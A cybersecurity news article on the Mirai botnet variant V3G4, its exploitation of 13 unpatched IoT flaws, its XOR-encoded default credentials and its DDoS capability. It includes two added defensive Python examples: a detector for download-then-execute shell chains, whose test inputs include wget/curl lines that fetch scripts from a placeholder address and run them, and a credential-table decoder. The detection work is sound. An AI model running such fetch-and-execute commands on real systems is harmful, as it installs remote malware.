
Mirai botnet variant V3G4 targeting 13 unpatched IoT vulnerabilities


Unit 42 researchers have observed threat actors leveraging a Mirai botnet variant called V3G4 in three campaigns targeting 13 unpatched vulnerabilities found in a range of IoT devices to propagate. A successful exploit could lead to remote code execution.

The researchers examined these campaigns from July to December 2022 and found that, upon exploit, “the wget and curl utilities automatically executed to download Mirai client samples from malware infrastructure and then executed the downloaded bot clients.”
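The download-then-run behavior quoted above is something defenders can look for in process-audit logs. The following is an added example, not code from Unit 42 or from the malware: it flags shell command chains in which a file fetched by wget or curl is executed later in the same chain. The function names and sample command lines are constructed for illustration.

```python
import posixpath
import re
import shlex
from urllib.parse import urlparse

SHELLS = {"sh", "bash", "ash", "dash"}


def saved_as(argv):
    """File name a wget/curl call writes to, or None if it saves nothing."""
    tool = posixpath.basename(argv[0])
    urls = [a for a in argv[1:] if re.match(r"(?:https?|ftp)://", a)]
    if tool not in ("wget", "curl") or not urls:
        return None
    flag = "-O" if tool == "wget" else "-o"  # explicit output-file option
    if flag in argv[:-1]:
        return posixpath.basename(argv[argv.index(flag) + 1])
    if tool == "curl" and "-O" not in argv:
        return None  # curl without -o/-O writes to stdout
    return posixpath.basename(urlparse(urls[0]).path) or "index.html"


def download_then_execute(cmdline):
    """Names of files fetched by wget/curl and then run later in the same chain."""
    fetched, hits = set(), []
    for step in filter(str.strip, re.split(r";|&&|\|\|", cmdline)):
        try:
            argv = shlex.split(step)
        except ValueError:  # unbalanced quotes: skip this step
            continue
        name = saved_as(argv)
        if name:
            fetched.add(name)
            continue
        prog = posixpath.basename(argv[0])
        # "sh file" runs its first argument; "./file" runs argv[0] itself.
        target = argv[1] if prog in SHELLS and len(argv) > 1 else argv[0]
        ran = posixpath.basename(target)
        if ran in fetched and ran not in hits:
            hits.append(ran)
    return hits


# Constructed command lines (TEST-NET addresses), as an audit log might record them.
SAMPLES = [
    "cd /tmp; wget http://192.0.2.10/fw.sh; chmod 777 fw.sh; sh fw.sh",
    "curl -O http://192.0.2.10/client.bin && chmod +x client.bin && ./client.bin",
    "wget -q https://updates.example.com/pkg.tar.gz; tar xzf pkg.tar.gz",
]
```

The first two samples are flagged and the third, which downloads an archive and only unpacks it, is not. Downloads piped straight into a shell are outside what this check covers.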

“V3G4 inherits its most significant feature from the original Mirai variant — a data section with embedded default login credentials for the scanner and brute force purposes,” according to researchers. “Like the original Mirai, it also encrypts all credentials with XOR key 0x37.”

Mirai is a well-known threat that keeps evolving its tactics to bring devices under its control and expand its botnet. Researchers have previously noted that the variant leveraged brute-forcing tactics and propagation techniques that are highly effective for botnet operators.

The threat actors behind Mirai were most recently observed exploiting a known critical vulnerability, CVE-2022-46169, found in the Cacti device monitoring tool. The attacks aimed to deliver Mirai malware and a PERL-based IRC botnet. Successful exploits spurred the launch of a host-based reverse shell.

According to BleepingComputer, a new Mirai-based variant emerged in the last month to distribute the Medusa denial-of-service botnet. The campaign has been dubbed a malware-as-a-service for DDoS. However, the actors appear to be working out bugs in the variant.

In the latest campaigns, Unit 42 found that once a device is compromised by the V3G4 variant, the attackers are able to fully control it and the platform becomes “part of the botnet.” That means the actor can use the device to conduct further attacks, including distributed denial-of-service (DDoS) attacks.

In the attempts observed by the researchers, the attacks used the known vulnerabilities to spread the V3G4 variant and targeted “exposed servers and networking devices running Linux.”

V3G4 then initializes the table of telnet/SSH login credentials in the scanner function before spreading by brute forcing network devices that use weak username and password combinations.
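Because the embedded credentials are only XORed with the single byte 0x37, an analyst can recover the scanner's credential table from a sample's data section and check which managed devices still use one of those passwords. The following is an added example, not code from the Unit 42 report: the blob, the inventory, and the function names are constructed, and it assumes each string is stored NUL-terminated with the terminator XORed as well.

```python
import string

XOR_KEY = 0x37  # single-byte key reported for V3G4 (from the article)
# Printable ASCII minus whitespace control characters.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def extract_xor_strings(blob: bytes, key: int = XOR_KEY, min_len: int = 4):
    """Return (offset, text) for every run of bytes that decodes to printable
    ASCII and ends in an encoded NUL. Assumption: strings are stored
    NUL-terminated and the terminator is XORed as well."""
    found, start = [], None
    for i, b in enumerate(blob):
        d = b ^ key
        if d in PRINTABLE:
            if start is None:
                start = i
            continue
        if start is not None and d == 0 and i - start >= min_len:
            found.append((start, xor_bytes(blob[start:i], key).decode("ascii")))
        start = None
    return found


def devices_using_recovered(inventory: dict, recovered: set) -> list:
    """Defender check: devices whose configured password is in the decoded set."""
    return sorted(name for name, (_user, pw) in inventory.items() if pw in recovered)


# Constructed sample "data section": filler bytes that do not decode to
# printable text, with three encoded strings in between. Not from a real sample.
FILLER = b"\x90\xff\x88\xc1"
SAMPLE_BLOB = FILLER + b"".join(
    xor_bytes(s + b"\x00") + FILLER for s in (b"root", b"admin1234", b"support")
)

# Constructed inventory: device name -> (username, password).
INVENTORY = {
    "cam-lobby": ("root", "admin1234"),
    "pbx-01": ("admin", "Xk9!vq2#Lm"),
    "router-edge": ("support", "support"),
}
```

Running `extract_xor_strings(SAMPLE_BLOB)` and passing the decoded strings to `devices_using_recovered` flags the two devices in the constructed inventory whose passwords appear in the decoded table.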

Before the botnet client establishes a connection with the C2 server, the malware will first initialize all DDoS attack functions (shown in Figure 9). Once the client establishes a connection with the C2 server, the threat actor can issue commands to the client to launch DDoS attacks.

The IoT devices targeted in these campaigns included FreePBX Elastix, Gitorious, FRITZ!Box Webcam, Mitel AWC, Geutebruck IP Cameras, Webmin, Spree Commerce, FLIR Thermal Camera, DrayTek Vigor, Airspan AirSpot, Atlassian Confluence, and C-Data Web Management System. The research contains links to the original CVE disclosures.

The CVEs date as far back as 2012 and 2014, but also include several vulnerabilities reported in the last year. However, all of the security bugs successfully targeted in these campaigns had been left unpatched by the affected entities.

What’s more, these vulnerabilities have a lower attack complexity than those seen with previously observed botnet variants, but still manage to “maintain a critical security impact” that can enable remote code execution. As such, the researchers are urging entities to patch or apply the software update if possible.

Researchers determined the campaigns were carried out by the same threat actors. Forensic evidence revealed the use of the same hardcoded command and control (C2) domains, nearly identical malware shell script downloaders, and the same XOR decryption key used in each campaign.

The samples also showed the same “stop list,” or the “list of target processes that the botnet client searches for and terminates,” as well as nearly identical functions in each.

The tactics used in these campaigns aren’t new for Mirai, which is well known for co-opting IoT devices to launch DDoS attacks. A spike in Mirai activity in February 2022 corresponded with the disclosure of Spring4Shell, a zero-day campaign on the Java web application framework, Spring Core.

Much like the recent campaigns, the previous attacks enabled unauthenticated remote code execution and further expanded the Mirai botnet.

Jessica Davis

The voice of healthcare cybersecurity and policy for SC Media, CyberRisk Alliance, driving industry-specific coverage of what matters most to healthcare and continuing to build relationships with industry stakeholders.
